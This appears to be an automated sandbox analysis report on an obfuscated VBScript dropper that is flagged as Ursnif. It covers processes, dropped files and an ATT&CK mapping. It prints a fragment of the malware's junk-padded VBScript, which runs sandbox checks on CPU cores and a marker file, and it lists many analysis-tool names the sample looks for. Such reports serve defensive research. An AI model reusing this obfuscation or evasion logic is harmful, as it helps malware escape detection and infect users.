            Source: Yara matchFile source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: 154.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@13/69@20/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{13FA4A3F-F956-11EA-90E2-ECF4BB862DED}.datJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\LyncJump to behavior
            Source: 154.vbsStatic file information: File size 1254418 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: d:\Eye\38\82\23\43\68\21\also\Small\Break\92\map.pdb source: wscript.exe, 00000000.00000003.395966357.0000027AE8202000.00000004.00000001.sdmp, fuss.egg.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(672320042)) > 0 And fgjQHhf = 0) ThenExit FunctionEnd IfSet jimnsDka = GetObject("winmgmts:\\.\root\cimv2")Set hygroscopiclItems = jimnsDka.ExecQuery("Select * from Win32_Processor", , (((107 - 1.0) - 14.0) + (-(114 - 70.0))))For Each Colosseum460 In hygroscopiclItemsIf Colosseum460.NumberOfCores < ((61 + (0.0)) + (-(33 + (72 + (-47.0))))) ThenpXFhVA = True' grapefruit, spectacle309, Ephraim. 4357318 methyl. 8949732 Gerard866 Phelps postcondition82 landmark methodology Fermi wacky, 1741975 backside. epigenetic desirous audacity exasperate Pusey lacquer chlordane Markovian858 Rockies Anglican detain is2 pass stingy straggle, 3849208 oblivious von adsorption anaglyph cartwheel bedimmed Dusenbury exorcist bearish chaste Katowice Berlioz deliver Braille tansy231, 2880955 allemand syenite Ecole flabbergast hoi smelly Peru finger, toddy End IfNextREM sidewalk vary birth ana341 backwater sanatorium midmorn clang owe254. plankton admiralty handiwork, bestubble apical breathy alp dimorphic plantain stall connector. shingle module. 1758662 congregate GA718 grippe truckload nucleate Jason leasehold lustful tactile shagbark thematic match430 forsworn gable curfew Daimler for822 Baptiste749 ashame Ifni quack. Pavlovian waltz plenipotentiary criteria, grizzle ninety sulfurous14 nihilism Nicholls musty backtrack salvo Negroes trombone evince ascend hydrostatic Volta, propos exciton split, 7311223 If pXFhVA ThenOShea707End If' gnarl Oxford, chap Fedora held Caleb horsepower557 parental participant junta nail Burtt scurvy chronograph699. sleazy tying godwit Carrie cancer Delilah chairlady762 sapient inlay thug TEX ternary gallon Phyllis130 pH lieu specular835 Foss barter dialup Herr Strickland lactose625 typo End FunctionFunction fgjQHhf()Set MgibfID = CreateObject("WScript.Shell")REM teak64, Somerset, Islamic dromedary677 accent aesthetic Markham nocturne duck766 psychiatry. Disneyland raindrop Lagos Sutton jess198 thigh739 Agatha avaricious Negroid password afferent Kong secret Lathrop Dianne Gannett roadhouse checksumming can Harriman wop595 McKeon719 heard ether150. Spanish305 Missouri oxalic318 monkeyflower baseball fright headphone774 external95 SSW167. Durham693 serf line, Paul iceman wolfish redtop span, wag flank noisemake. 6676067 Hoffman196. gird803 chipmunk namesake Byzantine insightful wing diachronic woodward washy tumultuous, appanage. 1455222 Holocene, invoke458 convulsion Curtis isotropy786 ordinate patchwork pardon cameramen McKinley Callisto propitiate candidacy innocuous feldspar992 counterweight. wastage crosscut exorcism claimant Landis = MgibfID.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "672320042" + ".txt"If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Landis) ThenREM am20 reflector biz myopia Leeds Irwin pedantic urge447 greenwood demote Marx proteolysis gash brash Hausa indulge columnar servitor denominate forgetting macrophage candidacy927 chunk watchmake bromide927 lo

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fuss.eggJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fuss.eggJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\154.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE(
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEH
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fuss.eggJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 500Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: fuss.egg.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection1Masquerading11OS Credential DumpingSecurity Software Discovery341Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSSystem Information Discovery125Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet